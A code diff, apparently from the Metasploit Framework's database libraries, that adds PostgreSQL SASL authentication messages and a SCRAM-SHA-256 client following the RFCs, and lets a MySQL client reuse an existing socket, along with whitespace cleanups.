+# https://www.postgresql.org/docs/current/sasl-authentication.html
+#
+# Binary format:
+# https://www.postgresql.org/docs/current/protocol-message-formats.html
+class AuthenticationSASL < Authentification
+  # Int32(10) - Specifies that SASL authentication is required.
+  register_auth_type 10
+
+  # @return [Array<String>] Name of a SASL authentication mechanisms
+  attr_reader :mechanisms
+
+  # @param [Array<String>] mechanisms
+  def initialize(mechanisms: [])
+    @mechanisms = mechanisms
+  end
+
+  def dump
+    auth_type_byte_size = 4
+    mechanism_bytes_size = mechanisms.sum(&:size) + (mechanisms.size + 1)
+    message__dump(auth_type_byte_size + mechanism_bytes_size) do |buffer|
+      buffer.write_int32_network(self.auth_type)
+      mechanisms.each do |mechanism|
+        buffer.write_cstring(mechanism)
+      end
+      buffer.write(Buffer::NUL)
+    end
+  end
+
+  def parse(buffer)
+    super do
+      # The message body is a list of SASL authentication mechanisms, in the
+      # server's order of preference. A zero byte is required as terminator after
+      # the last authentication mechanism name.
+      # https://github.com/postgres/postgres/blob/74a2dfee2255a1bace9b0053d014c4efa2823f4d/doc/src/sgml/protocol.sgml#L3584-L3602
+      @mechanisms ||= []
+      while buffer.peek != Buffer::NUL
+        @mechanisms << buffer.read_cstring
+      end
+      _null = buffer.read(1)
+    end
+  end
+end
+
+# AuthenticationSASLContinue (B)
+# https://www.postgresql.org/docs/current/protocol-message-formats.html
+class AuthenticationSASLContinue < Authentification
+  # Int32(11) - Specifies that this message contains a SASL challenge.
+  register_auth_type 11
+
+  # @return [String] SASL data, specific to the SASL mechanism being used.
+  attr_reader :value
+
+  # @param [String, nil] value
+  def initialize(value: nil)
+    @value = value
+  end
+
+  def dump
+    auth_type_byte_size = 4
+    value_size = value.size
+    message__dump(auth_type_byte_size + value_size) do |buffer|
+      buffer.write_int32_network(self.auth_type)
+      buffer.write(value)
+    end
+  end
+
+  def parse(buffer)
+    super do
+      @value = buffer.read_rest
+    end
+  end
+end
+
+# AuthenticationSASLFinal (B)
+# https://www.postgresql.org/docs/current/protocol-message-formats.html
+class AuthenticationSASLFinal < Authentification
+  # Int32(11) - Specifies that this message contains a SASL challenge.
+  register_auth_type 12
+
+  # @return [String] SASL outcome "additional data", specific to the SASL mechanism being used.
+  attr_reader :value
+
+  # @param [String] value
+  def initialize(value:)
+    @value = value
+  end
+
+  def dump
+    auth_type_byte_size = 4
+    value_size = value.size
+    message__dump(auth_type_byte_size + value_size) do |buffer|
+      buffer.write_int32_network(self.auth_type)
+      buffer.write(value)
+    end
+  end
+
+  def parse(buffer)
+    super do
+      @value = buffer.read_rest
+    end
+  end
+end
+
+class PasswordResponseMessage < Message
+  # Identifies the message as a password response. Note that this is also used for GSSAPI, SSPI and SASL response messages.
+  # The exact message type can be deduced from the context.
  register_message_type 'p'
+end
+
+class PasswordMessage < PasswordResponseMessage
  fields :password

  def dump
@@ -235,6 +344,86 @@ class PasswordMessage < Message
  end
 end

+# SASLInitialResponse (F). The client sends a SASLInitialResponse after choosing a SASL mechanism. The message includes the name of the selected
+# mechanism, and an optional Initial Client Response, if the selected mechanism uses that.
+#
+# https://www.postgresql.org/docs/current/protocol-message-formats.html
+# https://www.postgresql.org/docs/current/sasl-authentication.html
+class SaslInitialResponseMessage < PasswordResponseMessage
+
+  # @return [String] Name of the SASL authentication mechanism that the client selected.
+  attr_reader :mechanism
+
+  # @return [String] SASL mechanism specific "Initial Response" - specific to the SASL mechanism used
+  attr_reader :value
+
+  # @param [String] mechanism
+  # @param [String] value
+  def initialize(mechanism: nil, value: nil)
+    @mechanism = mechanism
+    @value = value
+  end
+
+  def dump
+    mechanism_size = mechanism.size + Buffer::NUL.size
+    value_size_prefix_size = 4
+    value_size = value.size
+    message_size = mechanism_size + value_size_prefix_size + value_size
+
+    super(message_size) do |buffer|
+      buffer.write_cstring(mechanism)
+      buffer.write_int32_network(value_size)
+      buffer.write(value)
+    end
+  end
+
+  def parse(buffer)
+    super do
+      @mechanism = buffer.read_cstring
+      _value_size_prefix_size = buffer.read_int32_network
+      @value = buffer.read_rest
+    end
+  end
+
+  def ==(other)
+    self.class == other.class &&
+      @mechanism == other.mechanism &&
+      @value == other.value
+  end
+end
+
+# SASLResponse (F)
+#
+# https://www.postgresql.org/docs/current/protocol-message-formats.html
+# https://www.postgresql.org/docs/current/sasl-authentication.html
+class SASLResponseMessage < PasswordResponseMessage
+
+  # @return [String] SASL mechanism specific "Initial Response" - specific to the SASL mechanism used
+  attr_reader :value
+
+  # @param [String] value
+  def initialize(value: nil)
+    @value = value
+  end
+
+  def dump
+    super(value.size) do |buffer|
+      buffer.write(value)
+    end
+  end
+
+  def parse(buffer)
+    super do
+      @value = buffer.read_rest
+    end
+  end
+
+  def ==(other)
+    self.class == other.class &&
+      @value == other.value
+  end
+end
+
 class ParameterStatus < Message
  register_message_type 'S'
  fields :key, :value
@@ -262,7 +451,7 @@ class BackendKeyData < Message
    super(4 + 4) do |buffer|
      buffer.write_int32_network(@process_id)
      buffer.write_int32_network(@secret_key)
-    end 
+    end
  end

  def parse(buffer)
@@ -309,7 +498,7 @@ class DataRow < Message
    super do
      n_cols = buffer.read_int16_network
      @columns = (1..n_cols).collect {
-        len = buffer.read_int32_network 
+        len = buffer.read_int32_network
        if len == -1
          nil
        else
@@ -352,12 +541,12 @@ module NoticeErrorMixin
  def dump
    raise ArgumentError if @field_type == 0 and not @field_values.empty?

-    sz = 1 
-    sz += @field_values.inject(1) {|sum, fld| sum + fld.size + 1} unless @field_type == 0 
+    sz = 1
+    sz += @field_values.inject(1) {|sum, fld| sum + fld.size + 1} unless @field_type == 0

    super(sz) do |buffer|
      buffer.write_byte(@field_type)
-      break if @field_type == 0 
+      break if @field_type == 0
      @field_values.each {|fld| buffer.write_cstring(fld) }
      buffer.write_byte(0)
    end
@@ -407,7 +596,7 @@ class Parse < Message

  def dump
    sz = @stmt_name.size + 1 + @query.size + 1 + 2 + (4 * @parameter_oids.size)
-    super(sz) do |buffer| 
+    super(sz) do |buffer|
      buffer.write_cstring(@stmt_name)
      buffer.write_cstring(@query)
      buffer.write_int16_network(@parameter_oids.size)
@@ -416,7 +605,7 @@ class Parse < Message
  end

  def parse(buffer)
-    super do 
+    super do
      @stmt_name = buffer.read_cstring
      @query = buffer.read_cstring
      n_oids = buffer.read_int16_network
@@ -498,7 +687,7 @@ class StartupMessage < Message
    buffer = Buffer.of_size(sz)
    buffer.write_int32_network(sz)
    buffer.write_int32_network(@proto_version)
-    @params.each_pair {|key, value| 
+    @params.each_pair {|key, value|
      buffer.write_cstring(key)
      buffer.write_cstring(value)
    }
@@ -0,0 +1,151 @@
+# -*- coding: binary -*-
+
+require 'base64'
+require 'openssl'
+require 'net/imap/sasl'
+
+# Namespace for Metasploit branch.
+module Msf
+module Db
+module PostgresPR
+
+# Implements SCRAM-SHA-256 authentication; The caller of #negotiate can additionally wrap the calculated authentication
+# models with SASL/GSSAPI as appropriate
+#
+# https://datatracker.ietf.org/doc/html/rfc7677#section-3
+class ScramSha256
+  class NormalizeError < ArgumentError
+  end
+
+  # @param [String] user
+  # @param [String] password
+  def negotiate(user, password)
+    random_nonce = b64(SecureRandom.bytes(32))
+
+    # Attributes: https://datatracker.ietf.org/doc/html/rfc5802#section-5
+    client_first_without_gs2_header = "n=#{normalize(user)},r=#{random_nonce}"
+    client_gs2_header = gs2_header(channel_binding: false)
+    client_first = "#{client_gs2_header}#{client_first_without_gs2_header}"
+
+    server_first_string = yield :client_first, client_first
+
+    server_first = parse_server_response(server_first_string)
+    server_nonce = server_first[:r]
+    server_salt = Base64.strict_decode64(server_first[:s])
+    iterations = server_first[:i].to_i
+
+    # https://datatracker.ietf.org/doc/html/rfc5802#section-3
+    salted_password = hi(normalize(password), server_salt, iterations)
+    client_key = hmac(salted_password, "Client Key")
+    stored_key = h(client_key)
+
+    client_final_without_proof = "c=#{b64(client_gs2_header)},r=#{server_nonce}"
+
+    auth_message = [client_first_without_gs2_header, server_first_string, client_final_without_proof].join(',')
+    client_signature = hmac(stored_key, auth_message)
+    client_proof = xor_strings(client_key, client_signature)
+    server_key = hmac(salted_password, "Server Key")
+    expected_server_signature = hmac(server_key, auth_message)
+
+    client_final = "#{client_final_without_proof},p=#{b64(client_proof)}"
+
+    server_final = yield :client_final, client_final
+    raise AuthenticationMethodMismatch, 'Server proof failed' if server_final != "v=#{b64(expected_server_signature)}"
+
+    nil
+  end
+
+  # Implements Normalize from https://datatracker.ietf.org/doc/html/rfc4013 -
+  # Apply the SASLprep profile [RFC4013] of the "stringprep" algorithm [RFC3454]
+  #
+  # @param [String] value
+  # @return [String]
+  def normalize(value)
+    ::Net::IMAP::SASL.saslprep(value, exception: true)
+  rescue ArgumentError => e
+    raise NormalizeError, e.message
+  end
+
+  # Hi function implementation from
+  # https://datatracker.ietf.org/doc/html/rfc5802#section-2.2
+  #
+  # @param [String] str
+  # @param [String] salt
+  # @param [Numeric] iteration_count
+  def hi(str, salt, iteration_count)
+    u = hmac(str, "#{salt.b}#{"\x00\x00\x00\x01".b}")
+    u_i = u
+    (iteration_count - 1).times do
+      u_i = hmac(str, u_i)
+      u = xor_strings(u, u_i)
+    end
+
+    u
+  end
+
+  # @return [String]
+  def hash_function_name
+    'SHA256'
+  end
+
+  # H function from
+  # https://datatracker.ietf.org/doc/html/rfc5802#section-2.2
+  #
+  # @param [String] str
+  def h(str)
+    OpenSSL::Digest.digest(hash_function_name, str)
+  end
+
+  # @param [String] key
+  # @param [String] message
+  # @return [String]
+  def hmac(key, message)
+    OpenSSL::HMAC.digest(hash_function_name, key, message)
+  end
+
+  # Implements https://datatracker.ietf.org/doc/html/rfc5801#section-4
+  # @return [String] The bytes for a gs2 header
+  def gs2_header(channel_binding: false)
+    # Specified as gs2-cb-flag
+    if channel_binding
+      # gs2_channel_binding_flag = 'y'
+      # Implementation skipped for now, just haven't
+      raise NotImplementedError, 'Channel binding not implemented'
+    else
+      gs2_channel_binding_flag = 'n'
+    end
+
+    gs2_authzid = nil
+    gs2_header = "#{gs2_channel_binding_flag},#{gs2_authzid},"
+    gs2_header
+  end
+
+  private
+
+  # @param [String] value
+  def b64(value)
+    Base64.strict_encode64(value)
+  end
+
+  # @param [String] s1
+  # @param [String] s2
+  # @return [String] the strings XOR'd
+  def xor_strings(s1, s2)
+    s1.bytes.zip(s2.bytes).map { |(b1, b2)| b1 ^ b2 }.pack("C*")
+  end
+
+  # Parses a server response string such as 'r=2kRpTcHEFyoG+UgDEpRBdVcJLTWh5WtxARhYOHcG27i7YxAi,s=GNpgixWS5E4INbrMf665Kw==,i=4096'
+  # into a Ruby hash equivalent { r: '2kRpT...', i: '4096' }
+  # @param [String] string Server string response string
+  def parse_server_response(string)
+    string.split(',')
+          .each_with_object({}) do |key_value, result|
+      key, value = key_value.split('=', 2)
+      result[key.to_sym] = value
+    end
+  end
+end
+
+end
+end
+end
@@ -104,7 +104,7 @@ class RbMysql
  # @param [String / nil] passwd password to connect to mysqld
  # @param [String / nil] db initial database name
  # @param [Integer / nil] port port number (used if host is not 'localhost' or nil)
-  # @param [String / nil] socket socket file name (used if host is 'localhost' or nil)
+  # @param [String / Socket / nil] socket socket file name (used if host is 'localhost' or nil), or an existing ::Socket instance
  # @param [Integer / nil] flag connection flag. RbMysql::CLIENT_* ORed
  # @return self
  def connect(host=nil, user=nil, passwd=nil, db=nil, port=nil, socket=nil, flag=0)
@@ -130,7 +130,7 @@ class RbMysql
    # === Argument
    # host :: [String] if "localhost" or "" nil then use UNIXSocket. Otherwise use TCPSocket
    # port :: [Integer] port number using by TCPSocket
-    # socket :: [String] socket file name using by UNIXSocket
+    # socket :: [String,Socket] socket file name using by UNIXSocket, or an existing ::Socket instance
    # conn_timeout :: [Integer] connect timeout (sec).
    # read_timeout :: [Integer] read timeout (sec).
    # write_timeout :: [Integer] write timeout (sec).
@@ -149,8 +149,12 @@ class RbMysql
            socket ||= ENV["MYSQL_UNIX_PORT"] || MYSQL_UNIX_PORT
            @sock = UNIXSocket.new socket
          else
-            port ||= ENV["MYSQL_TCP_PORT"] || (Socket.getservbyname("mysql","tcp") rescue MYSQL_TCP_PORT)
-            @sock = TCPSocket.new host, port
+            if !socket
+              port ||= ENV["MYSQL_TCP_PORT"] || (Socket.getservbyname("mysql","tcp") rescue MYSQL_TCP_PORT)
+              @sock = TCPSocket.new host, port
+            else
+              @sock = socket
+            end
          end
        end
      rescue Timeout::Error
@@ -502,7 +506,7 @@ class RbMysql
          f, errno, message = data.unpack("Cva*")    # Version 4.0 Error
          @sqlstate = ""
        end
-        message.force_encoding(@charset.encoding)
+        message.force_encoding(@charset.encoding) if @charset
        if RbMysql::ServerError::ERROR_MAP.key? errno
          raise RbMysql::ServerError::ERROR_MAP[errno].new(message, @sqlstate)
        end
--- a/Show More
+++ b/Show More